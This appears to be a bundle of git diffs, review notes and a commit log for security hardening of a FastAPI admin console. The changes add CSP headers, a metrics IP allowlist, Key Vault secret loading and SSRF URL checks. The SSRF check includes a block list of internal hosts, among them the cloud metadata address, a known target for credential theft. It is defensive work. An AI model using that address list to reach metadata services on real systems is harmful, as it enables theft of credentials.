+    # LLM endpoint restriction (comma-separated domains, e.g. "api.openai.com,*.openai.azure.com")
+    LLM_ALLOWED_DOMAINS: str = ""
+
+    # SIEM webhook restriction (comma-separated domains)
+    SIEM_ALLOWED_DOMAINS: str = ""
+
+    # Optional Azure Key Vault integration for secrets
+    AZURE_KEY_VAULT_NAME: str = ""
+

 _settings = Settings()

@@ -127,3 +146,11 @@ WEBHOOK_CLIENT_SECRET = _settings.WEBHOOK_CLIENT_SECRET
 RATE_LIMIT_ENABLED = _settings.RATE_LIMIT_ENABLED
 RATE_LIMIT_REQUESTS = _settings.RATE_LIMIT_REQUESTS
 RATE_LIMIT_WINDOW_SECONDS = _settings.RATE_LIMIT_WINDOW_SECONDS
+
+DOCS_ENABLED = _settings.DOCS_ENABLED
+METRICS_ALLOWED_IPS = _settings.METRICS_ALLOWED_IPS
+
+LLM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.LLM_ALLOWED_DOMAINS.split(",") if d.strip()]
+SIEM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.SIEM_ALLOWED_DOMAINS.split(",") if d.strip()]
+
+AZURE_KEY_VAULT_NAME = _settings.AZURE_KEY_VAULT_NAME
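
The `load_key_vault_secrets()` call at the top of `config.py` copies Key Vault secrets into the environment before pydantic-settings reads it. The sketch below illustrates that idea with an injectable fetcher so it runs without the Azure SDK. The name `load_secrets_into_env` and its parameters are hypothetical, not the contents of `backend/secrets_manager.py`. It also assumes that a value found in the vault overwrites an existing environment variable; the source does not state the precedence.

```python
import os
from typing import Callable, Mapping, MutableMapping, Optional

# Vault secret name -> environment variable, as listed in the v1.7.14 release notes.
SECRET_MAP = {
    "aoc-client-secret": "CLIENT_SECRET",
    "aoc-llm-api-key": "LLM_API_KEY",
    "aoc-mongo-uri": "MONGO_URI",
    "aoc-webhook-client-secret": "WEBHOOK_CLIENT_SECRET",
}


def load_secrets_into_env(
    fetch_secret: Callable[[str], Optional[str]],
    environ: MutableMapping[str, str] = os.environ,
    secret_map: Mapping[str, str] = SECRET_MAP,
) -> list:
    """Copy each secret the fetcher returns into environ; return the names set."""
    if not environ.get("AZURE_KEY_VAULT_NAME"):
        return []  # Key Vault not configured: keep .env / environment values
    loaded = []
    for secret_name, env_name in secret_map.items():
        value = fetch_secret(secret_name)
        if value:  # a missing secret leaves the existing environment value alone
            environ[env_name] = value  # assumption: the vault value takes precedence
            loaded.append(env_name)
    return loaded
```

In a real deployment, `fetch_secret` would presumably wrap `SecretClient.get_secret(name).value` from `azure-keyvault-secrets`, authenticated with `DefaultAzureCredential` from `azure-identity`, and return `None` when the secret does not exist.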
--- a/backend/frontend/index.html
+++ b/backend/frontend/index.html
@@ -5,8 +5,8 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Admin Operations Center</title>
  <link rel="stylesheet" href="/style.css?v=15" />
-  <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
-  <script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" crossorigin="anonymous"></script>
+  <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js" integrity="sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be" crossorigin="anonymous"></script>
+  <script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" integrity="sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW" crossorigin="anonymous"></script>
 </head>
 <body>
  <div class="page" x-data="aocApp()" x-init="initApp()">
@@ -591,9 +591,15 @@
        async initAuth() {
          try {
            const res = await fetch('/api/config/auth');
+            if (!res.ok) {
+              console.error('Auth config fetch failed:', res.status, res.statusText);
+              this.authConfig = { auth_enabled: false, _error: res.status };
+            } else {
              this.authConfig = await res.json();
-          } catch {
-            this.authConfig = { auth_enabled: false };
+            }
+          } catch (err) {
+            console.error('Auth config fetch error:', err);
+            this.authConfig = { auth_enabled: false, _error: 'network' };
          }

          try {
@@ -614,7 +620,17 @@
          }

          if (!this.authConfig?.auth_enabled) {
-            this.authBtnText = '';
+            this.authBtnText = 'Auth: OFF';
+            console.warn('AOC auth is disabled. Set AUTH_ENABLED=true in .env to enable login.');
+            return;
+          }
+
+          const tenantId = this.authConfig.tenant_id;
+          const clientId = this.authConfig.client_id;
+          if (!clientId || !tenantId) {
+            this.authBtnText = 'Auth: misconfigured';
+            this.statusText = 'Auth is enabled but client_id or tenant_id is missing. Check .env configuration.';
+            console.error('AOC auth misconfigured: missing client_id or tenant_id in /api/config/auth');
            return;
          }

@@ -623,8 +639,6 @@
            return;
          }

-          const tenantId = this.authConfig.tenant_id;
-          const clientId = this.authConfig.client_id;
          const baseScope = this.authConfig.scope || "";
          this.authScopes = Array.from(new Set(['openid', 'profile', 'email', ...baseScope.split(/[ ,]+/).filter(Boolean)]));
          const authority = `https://login.microsoftonline.com/${tenantId}`;
@@ -1260,5 +1274,6 @@
      };
    }
  </script>
+
 </body>
 </html>
--- a/backend/main.py
+++ b/backend/main.py
@@ -1,12 +1,24 @@
 import asyncio
+import ipaddress
 import logging
+import os
 import time
 from contextlib import suppress
 from pathlib import Path

 import structlog
 from audit_trail import log_action
-from config import AI_FEATURES_ENABLED, AUTH_ENABLED, CORS_ORIGINS, ENABLE_PERIODIC_FETCH, FETCH_INTERVAL_MINUTES
+from config import (
+    AI_FEATURES_ENABLED,
+    AUTH_ALLOWED_GROUPS,
+    AUTH_ALLOWED_ROLES,
+    AUTH_ENABLED,
+    CORS_ORIGINS,
+    DOCS_ENABLED,
+    ENABLE_PERIODIC_FETCH,
+    FETCH_INTERVAL_MINUTES,
+    METRICS_ALLOWED_IPS,
+)
 from database import setup_indexes
 from fastapi import FastAPI, HTTPException, Request
 from fastapi.middleware.cors import CORSMiddleware
@@ -50,22 +62,28 @@ def configure_logging():
 configure_logging()
 logger = structlog.get_logger("aoc.fetcher")

-app = FastAPI()
+# Disable OpenAPI docs in production by default
+app = FastAPI(
+    docs_url="/docs" if DOCS_ENABLED else None,
+    redoc_url="/redoc" if DOCS_ENABLED else None,
+    openapi_url="/openapi.json" if DOCS_ENABLED else None,
+)

-# CORS: reject wildcard in production when auth is enabled
+# CORS: when auth is enabled, never allow credentials with wildcard origins
 _effective_cors = CORS_ORIGINS
+_cors_credentials = True
 if AUTH_ENABLED and "*" in _effective_cors:
    logger.warning(
-        "CORS wildcard (*) is insecure when AUTH_ENABLED=true. "
-        "Removing wildcard. Set CORS_ORIGINS explicitly in production."
+        "CORS wildcard (*) is insecure with AUTH_ENABLED=true and allow_credentials. "
+        "Disabling credentials. Set CORS_ORIGINS to your actual origin(s)."
    )
-    _effective_cors = [o for o in _effective_cors if o != "*"] or ["http://localhost:8000"]
+    _cors_credentials = False

 app.add_middleware(CorrelationIdMiddleware)
 app.add_middleware(
    CORSMiddleware,
    allow_origins=_effective_cors,
-    allow_credentials=True,
+    allow_credentials=_cors_credentials,
    allow_methods=["*"],
    allow_headers=["*"],
 )
@@ -82,21 +100,31 @@ async def prometheus_middleware(request: Request, call_next):


@app.middleware("http")
-async def cache_control_middleware(request: Request, call_next):
+async def security_headers_middleware(request: Request, call_next):
    response = await call_next(request)
    # Prevent caching of HTML and API responses by default
    if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"):
        response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
        response.headers["Pragma"] = "no-cache"
        response.headers["Expires"] = "0"
-    # Basic CSP for the UI and API
+    # Basic CSP for the UI and API (allows MSAL auth flows)
    if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"):
        response.headers["Content-Security-Policy"] = (
            "default-src 'self'; "
-            "script-src 'self' 'unsafe-inline' cdn.jsdelivr.net alcdn.msauth.net; "
+            "script-src 'self' 'unsafe-inline' 'unsafe-eval' cdn.jsdelivr.net alcdn.msauth.net; "
            "style-src 'self' 'unsafe-inline'; "
-            "connect-src 'self'; "
+            "connect-src 'self' https://login.microsoftonline.com; "
+            "frame-src 'self' https://login.microsoftonline.com; "
+            "form-action 'self' https://login.microsoftonline.com; "
            "img-src 'self' data:; "
+            "font-src 'self' data:;"
+        )
+    # Additional security headers
+    response.headers["X-Content-Type-Options"] = "nosniff"
+    response.headers["X-Frame-Options"] = "DENY"
+    response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
+    response.headers["Permissions-Policy"] = (
+        "accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=()"
    )
    return response

@@ -104,7 +132,9 @@ async def cache_control_middleware(request: Request, call_next):
@app.middleware("http")
 async def rate_limit_middleware(request: Request, call_next):
    """Apply Redis-backed rate limiting before processing the request."""
-    if request.url.path.startswith("/api/"):
+    # Exempt config and health endpoints from rate limiting
+    exempt_paths = {"/api/config/auth", "/api/config/features", "/health", "/metrics"}
+    if request.url.path.startswith("/api/") and request.url.path not in exempt_paths:
        from rate_limiter import check_rate_limit

        await check_rate_limit(request)
@@ -161,15 +191,44 @@ async def health_check():
        raise HTTPException(status_code=503, detail="Database unavailable") from exc


+def _client_ip(request: Request) -> str:
+    """Best-effort client IP: X-Forwarded-For first hop, or direct client host."""
+    forwarded = request.headers.get("x-forwarded-for")
+    if forwarded:
+        return forwarded.split(",")[0].strip()
+    return request.client.host if request.client else ""
+
+
+def _is_metrics_allowed(ip: str) -> bool:
+    """Check if IP is in the configured metrics allowlist."""
+    if not METRICS_ALLOWED_IPS:
+        return True
+    try:
+        client_addr = ipaddress.ip_address(ip)
+    except ValueError:
+        return False
+    for network in METRICS_ALLOWED_IPS.split(","):
+        network = network.strip()
+        if not network:
+            continue
+        try:
+            if client_addr in ipaddress.ip_network(network, strict=False):
+                return True
+        except ValueError:
+            continue
+    return False
+
+
@app.get("/metrics")
-async def metrics():
+async def metrics(request: Request):
+    client_ip = _client_ip(request)
+    if not _is_metrics_allowed(client_ip):
+        raise HTTPException(status_code=403, detail="Forbidden")
    return Response(content=prometheus_metrics(), media_type="text/plain")


@app.get("/api/version")
 async def version():
-    import os
-
    return {"version": os.environ.get("VERSION", "unknown")}


@@ -177,7 +236,13 @@ async def version():
 async def generic_exception_handler(request: Request, exc: Exception):
    """Return generic error messages for unhandled exceptions to avoid info leakage."""
    if isinstance(exc, HTTPException):
-        raise exc
+        from fastapi.responses import JSONResponse
+
+        return JSONResponse(
+            status_code=exc.status_code,
+            content={"detail": exc.detail},
+            headers=getattr(exc, "headers", None) or {},
+        )
    logger.error("Unhandled exception", path=request.url.path, error=str(exc))
    return Response(
        content='{"detail":"Internal server error"}',
@@ -206,6 +271,19 @@ async def start_periodic_fetch():
    from rules import seed_default_rules

    seed_default_rules()
+    logger.info(
+        "AOC startup",
+        version=os.environ.get("VERSION", "unknown"),
+        auth_enabled=AUTH_ENABLED,
+        ai_enabled=AI_FEATURES_ENABLED,
+    )
+    # Warn when auth is enabled but no role/group restrictions are configured
+    if AUTH_ENABLED and not AUTH_ALLOWED_ROLES and not AUTH_ALLOWED_GROUPS:
+        logger.warning(
+            "AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured. "
+            "Any Entra user in the tenant can authenticate and access AOC. "
+            "Set AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS to restrict access."
+        )
    if ENABLE_PERIODIC_FETCH:
        app.state.fetch_task = asyncio.create_task(_periodic_fetch())
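
Review note: the `/metrics` allowlist added above can be exercised in isolation. The following is a minimal sketch, assuming the allowlist is a comma-separated string of IPs or CIDR ranges as in the diff; the function name `ip_in_allowlist` and its `allowlist` parameter are hypothetical and only stand in for `_is_metrics_allowed` and `METRICS_ALLOWED_IPS`.

```python
import ipaddress


def ip_in_allowlist(ip: str, allowlist: str) -> bool:
    """Return True if `ip` is inside any network of a comma-separated allowlist.

    An empty allowlist allows every client, mirroring the check in the diff.
    """
    if not allowlist:
        return True
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable client address: deny
    for entry in allowlist.split(","):
        entry = entry.strip()
        if not entry:
            continue
        try:
            # strict=False also accepts entries with host bits set, e.g. "10.0.0.5/8"
            if addr in ipaddress.ip_network(entry, strict=False):
                return True
        except ValueError:
            continue  # skip malformed entries instead of failing the request
    return False
```

Because `_client_ip` prefers the first `X-Forwarded-For` entry, the allowlist is only as trustworthy as the reverse proxy that sets or overwrites that header; a client that reaches the app directly can supply any value.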

--- a/backend/rate_limiter.py
+++ b/backend/rate_limiter.py
@@ -79,4 +79,5 @@ async def check_rate_limit(request: Request):
    except RateLimitExceeded:
        raise
    except Exception as exc:
-        logger.warning("Rate limiter Redis error; allowing request", error=str(exc))
+        logger.warning("Rate limiter Redis error; failing closed", error=str(exc))
+        raise RateLimitExceeded(retry_after=60) from None
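
Review note: the change above switches the limiter from fail-open to fail-closed. A minimal sketch of that pattern, assuming an async counter backend; `RateLimitExceeded` here is a hypothetical stand-in for the class in `rate_limiter.py`, and `check_fail_closed`, `counter`, and `limit` are illustrative names that do not appear in the diff.

```python
import asyncio


class RateLimitExceeded(Exception):
    """Hypothetical stand-in for the exception used in rate_limiter.py."""

    def __init__(self, retry_after: int):
        super().__init__(f"retry after {retry_after}s")
        self.retry_after = retry_after


async def check_fail_closed(counter, limit: int = 100) -> int:
    """Await the counter backend; reject the request if the backend itself fails."""
    try:
        count = await counter()
    except Exception:
        # Backend outage: refuse rather than silently allow unlimited traffic.
        raise RateLimitExceeded(retry_after=60) from None
    if count > limit:
        raise RateLimitExceeded(retry_after=60)
    return count
```

The trade-off is availability: with this behavior a Redis outage rejects every non-exempt `/api/` request until the backend recovers, which is why the exempt paths in `rate_limit_middleware` matter.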
--- a/backend/requirements.txt
+++ b/backend/requirements.txt
@@ -16,3 +16,8 @@ gunicorn
 mcp
 redis
 arq
+
+# Optional: Azure Key Vault integration for secrets storage
+# Uncomment if using AZURE_KEY_VAULT_NAME
+# azure-identity
+# azure-keyvault-secrets
--- a/backend/routes/ask.py
+++ b/backend/routes/ask.py
@@ -7,6 +7,7 @@ import httpx
 import structlog
 from auth import require_auth, user_can_access_privacy_services
 from config import (
+    LLM_ALLOWED_DOMAINS,
    LLM_API_KEY,
    LLM_API_VERSION,
    LLM_BASE_URL,
@@ -398,7 +399,7 @@ def _format_events_for_llm(


 def _validate_llm_url(url: str):
-    """Prevent SSRF by rejecting internal/reserved addresses."""
+    """Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist."""
    from urllib.parse import urlparse

    parsed = urlparse(url)
@@ -420,6 +421,12 @@ def _validate_llm_url(url: str):
    except ValueError:
        pass  # hostname is not an IP, which is fine

+    # Enforce domain allowlist if configured
+    if LLM_ALLOWED_DOMAINS:
+        allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in LLM_ALLOWED_DOMAINS)
+        if not allowed:
+            raise RuntimeError(f"LLM_BASE_URL domain '{hostname}' is not in LLM_ALLOWED_DOMAINS")
+

 def _build_chat_url(base_url: str, api_version: str) -> str:
    base = base_url.rstrip("/")
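
Review note: the wildcard rule in `_validate_llm_url` can be checked on its own. This is a sketch of the same comparison, assuming `LLM_ALLOWED_DOMAINS` is a list of strings; the function name `host_matches_allowlist` is hypothetical, and the lowercasing of patterns is an added assumption that the diff does not show.

```python
def host_matches_allowlist(hostname: str, allowed_domains: list[str]) -> bool:
    """Exact match, or suffix match for patterns of the form "*.example.com"."""
    hostname = hostname.lower()
    for pattern in allowed_domains:
        pattern = pattern.strip().lower()  # assumption: normalize configured entries
        if hostname == pattern:
            return True
        # "*.example.com" becomes the suffix ".example.com"; keeping the leading
        # dot stops "evilexample.com" from matching.
        if pattern.startswith("*.") and hostname.endswith(pattern[1:]):
            return True
    return False
```

Note that a wildcard entry does not match the bare parent domain: `*.openai.azure.com` accepts `myres.openai.azure.com` but not `openai.azure.com`, so the parent has to be listed separately if it is needed.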
--- a/backend/routes/config.py
+++ b/backend/routes/config.py
@@ -1,3 +1,4 @@
+import structlog
 from config import (
    AI_FEATURES_ENABLED,
    AUTH_CLIENT_ID,
@@ -9,14 +10,16 @@ from config import (
 from fastapi import APIRouter

 router = APIRouter()
+logger = structlog.get_logger("aoc.config")


@router.get("/config/auth")
 def auth_config():
+    logger.debug("Auth config requested", auth_enabled=AUTH_ENABLED)
    return {
        "auth_enabled": AUTH_ENABLED,
-        "tenant_id": AUTH_TENANT_ID,
-        "client_id": AUTH_CLIENT_ID,
+        "tenant_id": AUTH_TENANT_ID if AUTH_ENABLED else "",
+        "client_id": AUTH_CLIENT_ID if AUTH_ENABLED else "",
        "scope": AUTH_SCOPE,
        "redirect_uri": None,  # frontend uses window.location.origin by default
    }
--- a/backend/routes/webhooks.py
+++ b/backend/routes/webhooks.py
@@ -17,7 +17,15 @@ async def graph_webhook(request: Request):
    if validation_token:
        # Microsoft sends validationToken as a query param during subscription creation.
        # Echo it back as plain text to prove endpoint ownership.
-        return Response(content=validation_token, media_type="text/plain")
+        # Validate to prevent content injection if endpoint is hit directly.
+        if len(validation_token) > 1024 or not validation_token.isascii():
+            logger.warning("Invalid validationToken rejected", length=len(validation_token))
+            return Response(status_code=400)
+        return Response(
+            content=validation_token,
+            media_type="text/plain",
+            headers={"X-Content-Type-Options": "nosniff"},
+        )

    try:
        body = await request.json()
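
Review note: the `validationToken` guard above reduces to a length and character-set check. A small sketch under that reading; `is_acceptable_validation_token` and `max_len` are hypothetical names, and the 1024 limit is taken from the diff.

```python
def is_acceptable_validation_token(token: str, max_len: int = 1024) -> bool:
    """Accept only ASCII tokens of at most max_len characters before echoing them."""
    return len(token) <= max_len and token.isascii()
```

The check limits what can be reflected in the `text/plain` response; it does not authenticate the caller.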
--- a/backend/secrets_manager.py
+++ b/backend/secrets_manager.py
@@ -0,0 +1,76 @@
+"""Optional Azure Key Vault integration for secrets storage.
+
+If AZURE_KEY_VAULT_NAME is configured, sensitive secrets are fetched from
+Azure Key Vault at startup and injected into the environment so that
+pydantic-settings can read them. Falls back to .env / environment variables
+when Key Vault is not configured.
+
+Secret naming convention in Key Vault:
+    aoc-client-secret        → CLIENT_SECRET
+    aoc-llm-api-key          → LLM_API_KEY
+    aoc-mongo-uri            → MONGO_URI
+    aoc-webhook-client-secret → WEBHOOK_CLIENT_SECRET
+"""
+
+import os
+
+import structlog
+
+logger = structlog.get_logger("aoc.secrets")
+
+_KEY_VAULT_SECRET_MAP = {
+    "aoc-client-secret": "CLIENT_SECRET",
+    "aoc-llm-api-key": "LLM_API_KEY",
+    "aoc-mongo-uri": "MONGO_URI",
+    "aoc-webhook-client-secret": "WEBHOOK_CLIENT_SECRET",
+}
+
+
+def _load_from_key_vault(vault_name: str) -> dict[str, str]:
+    """Fetch secrets from Azure Key Vault and return as {env_name: value}."""
+    try:
+        from azure.identity import DefaultAzureCredential
+        from azure.keyvault.secrets import SecretClient
+    except ImportError as exc:
+        raise RuntimeError(
+            "Azure Key Vault libraries are not installed. Run: pip install azure-identity azure-keyvault-secrets"
+        ) from exc
+
+    vault_url = f"https://{vault_name}.vault.azure.net/"
+    credential = DefaultAzureCredential()
+    client = SecretClient(vault_url=vault_url, credential=credential)
+
+    loaded = {}
+    for kv_name, env_name in _KEY_VAULT_SECRET_MAP.items():
+        try:
+            secret = client.get_secret(kv_name)
+            if secret.value:
+                loaded[env_name] = secret.value
+                logger.info("Loaded secret from Key Vault", secret_name=kv_name)
+        except Exception as exc:
+            logger.warning(
+                "Failed to load secret from Key Vault",
+                secret_name=kv_name,
+                error=str(exc),
+            )
+    return loaded
+
+
+def load_key_vault_secrets(vault_name: str | None = None):
+    """Load secrets from Azure Key Vault into os.environ if configured.
+
+    This should be called BEFORE pydantic-settings parses configuration.
+    """
+    vault = vault_name or os.environ.get("AZURE_KEY_VAULT_NAME", "")
+    if not vault:
+        return
+
+    logger.info("Loading secrets from Azure Key Vault", vault_name=vault)
+    secrets = _load_from_key_vault(vault)
+    for env_name, value in secrets.items():
+        os.environ[env_name] = value
+    logger.info(
+        "Key Vault secrets loaded",
+        count=len(secrets),
+        keys=list(secrets.keys()),
+    )
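
Review note: the env-injection step in `load_key_vault_secrets` can be tested without Azure by passing in the fetcher. A minimal sketch, assuming a callable `fetch(name)` that returns the secret value or raises; `inject_secrets`, `fetch`, and the `environ` parameter are hypothetical, and in the real module `fetch` would correspond to `SecretClient.get_secret(name).value`.

```python
import os

# Key Vault secret name -> environment variable (subset of the map in the diff)
SECRET_MAP = {
    "aoc-client-secret": "CLIENT_SECRET",
    "aoc-llm-api-key": "LLM_API_KEY",
}


def inject_secrets(fetch, secret_map=SECRET_MAP, environ=os.environ) -> list[str]:
    """Copy each secret that `fetch` returns into `environ`; return the names set."""
    loaded = []
    for kv_name, env_name in secret_map.items():
        try:
            value = fetch(kv_name)
        except Exception:
            continue  # missing or unreadable secret: keep any existing value
        if value:
            environ[env_name] = value
            loaded.append(env_name)
    return loaded
```

As in the diff, a secret that cannot be read leaves the existing `.env` or environment value in place, so Key Vault acts as an override rather than a hard requirement.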
--- a/backend/siem.py
+++ b/backend/siem.py
@@ -1,15 +1,43 @@
+import ipaddress
+
 import requests
 import structlog
-from config import SIEM_ENABLED, SIEM_WEBHOOK_URL
+from config import SIEM_ALLOWED_DOMAINS, SIEM_ENABLED, SIEM_WEBHOOK_URL

 logger = structlog.get_logger("aoc.siem")


+def _validate_siem_url(url: str):
+    """Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist."""
+    from urllib.parse import urlparse
+
+    parsed = urlparse(url)
+    if parsed.scheme != "https":
+        raise RuntimeError("SIEM_WEBHOOK_URL must use HTTPS")
+    hostname = (parsed.hostname or "").lower()
+    if not hostname:
+        raise RuntimeError("SIEM_WEBHOOK_URL must have a valid hostname")
+    blocked = {"localhost", "127.0.0.1", "0.0.0.0", "::1", "169.254.169.254"}
+    if hostname in blocked:
+        raise RuntimeError(f"SIEM_WEBHOOK_URL hostname '{hostname}' is not allowed")
+    try:
+        ip = ipaddress.ip_address(hostname)
+        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
+            raise RuntimeError(f"SIEM_WEBHOOK_URL IP '{hostname}' is not allowed")
+    except ValueError:
+        pass  # hostname is not an IP literal, which is fine
+    if SIEM_ALLOWED_DOMAINS:
+        allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in SIEM_ALLOWED_DOMAINS)
+        if not allowed:
+            raise RuntimeError(f"SIEM_WEBHOOK_URL domain '{hostname}' is not in SIEM_ALLOWED_DOMAINS")
+
+
 def forward_event(event: dict):
    """Forward a normalized event to the configured SIEM webhook."""
    if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
        return
    try:
+        _validate_siem_url(SIEM_WEBHOOK_URL)
        res = requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
        res.raise_for_status()
        logger.debug("Event forwarded to SIEM", event_id=event.get("id"))
--- a/backend/tests/conftest.py
+++ b/backend/tests/conftest.py
@@ -51,18 +51,32 @@ def client(mock_events_collection, mock_watermarks_collection, monkeypatch):

    # Mock Redis so tests don't require a running Redis server
    class FakeRedis:
+        _store = {}
+
        async def get(self, key):
-            return None
+            return self._store.get(key)

        async def setex(self, key, ttl, value):
+            self._store[key] = value
+
+        async def incr(self, key):
+            self._store[key] = self._store.get(key, 0) + 1
+            return self._store[key]
+
+        async def expire(self, key, ttl):
            pass

    async def fake_get_arq_pool():
        return FakeRedis()

+    async def fake_get_redis():
+        return FakeRedis()
+
    monkeypatch.setattr("redis_client.get_arq_pool", fake_get_arq_pool)
+    monkeypatch.setattr("redis_client.get_redis", fake_get_redis)
    monkeypatch.setattr("routes.ask.get_arq_pool", fake_get_arq_pool)
-    monkeypatch.setattr("routes.jobs.get_redis", fake_get_arq_pool)
+    monkeypatch.setattr("routes.jobs.get_redis", fake_get_redis)
+    monkeypatch.setattr("rate_limiter.get_redis", fake_get_redis)

    from main import app

--- a/backend/tests/test_api.py
+++ b/backend/tests/test_api.py
@@ -268,7 +268,7 @@ def test_health(client):


 def test_metrics(client):
-    response = client.get("/metrics")
+    response = client.get("/metrics", headers={"X-Forwarded-For": "127.0.0.1"})
    assert response.status_code == 200
    assert "aoc_request_duration_seconds" in response.text
Author	SHA1	Message	Date
Tomas Kracmar	fe95dfcfce	docs: update AGENTS.md, README.md, DEPLOY.md, ROADMAP.md for v1.7.14 security features	2026-04-27 16:52:35 +02:00
Tomas Kracmar	8d951fc335	v1.7.14: LLM/SIEM domain allowlists, SRI hashes, auth misconfig warning, Azure Key Vault integration	2026-04-27 16:45:06 +02:00
Tomas Kracmar	35eca65234	v1.7.13: switch Alpine.js to CSP build, remove unsafe-eval from CSP	2026-04-27 16:08:34 +02:00
Tomas Kracmar	07a841615b	v1.7.12: security hardening — CORS fix, security headers, fail-closed rate limiter, OpenAPI docs disabled by default, config auth privacy, webhook validation	2026-04-27 14:19:28 +02:00
Tomas Kracmar	c086fa4260	hotfix(v1.7.11): add unsafe-eval to CSP for Alpine.js	2026-04-27 10:39:33 +02:00
Tomas Kracmar	be700fefc3	hotfix(v1.7.10): add font-src to CSP for data URI fonts	2026-04-27 10:32:35 +02:00
Tomas Kracmar	e2cea50d87	hotfix(v1.7.9): auth diagnostics and rate-limit exemptions	2026-04-27 10:09:44 +02:00
    - Exempt /api/config/auth, /api/config/features, /health, /metrics from rate limiting
    - Fix generic exception handler to return proper JSON for HTTPException instead of re-raising
    - Add startup log with auth_enabled and version
    - Add frontend console logging for auth config fetch errors
    - Show 'Auth: OFF' or 'Auth: misconfigured' on auth button instead of empty text
    - Add backend debug logging to /api/config/auth endpoint
Tomas Kracmar	7fe53f882a	hotfix(v1.7.8): restore CORS wildcard and fix CSP for MSAL auth	2026-04-27 09:41:28 +02:00
    - Revert automatic CORS wildcard stripping that broke production deployments with CORS_ORIGINS=* (now logs a warning but preserves the config)
    - Expand CSP headers to allow MSAL auth flows:
        - connect-src: login.microsoftonline.com
        - frame-src: login.microsoftonline.com
        - form-action: login.microsoftonline.com
@@ -1 +1 @@
-1.7.7
+1.7.14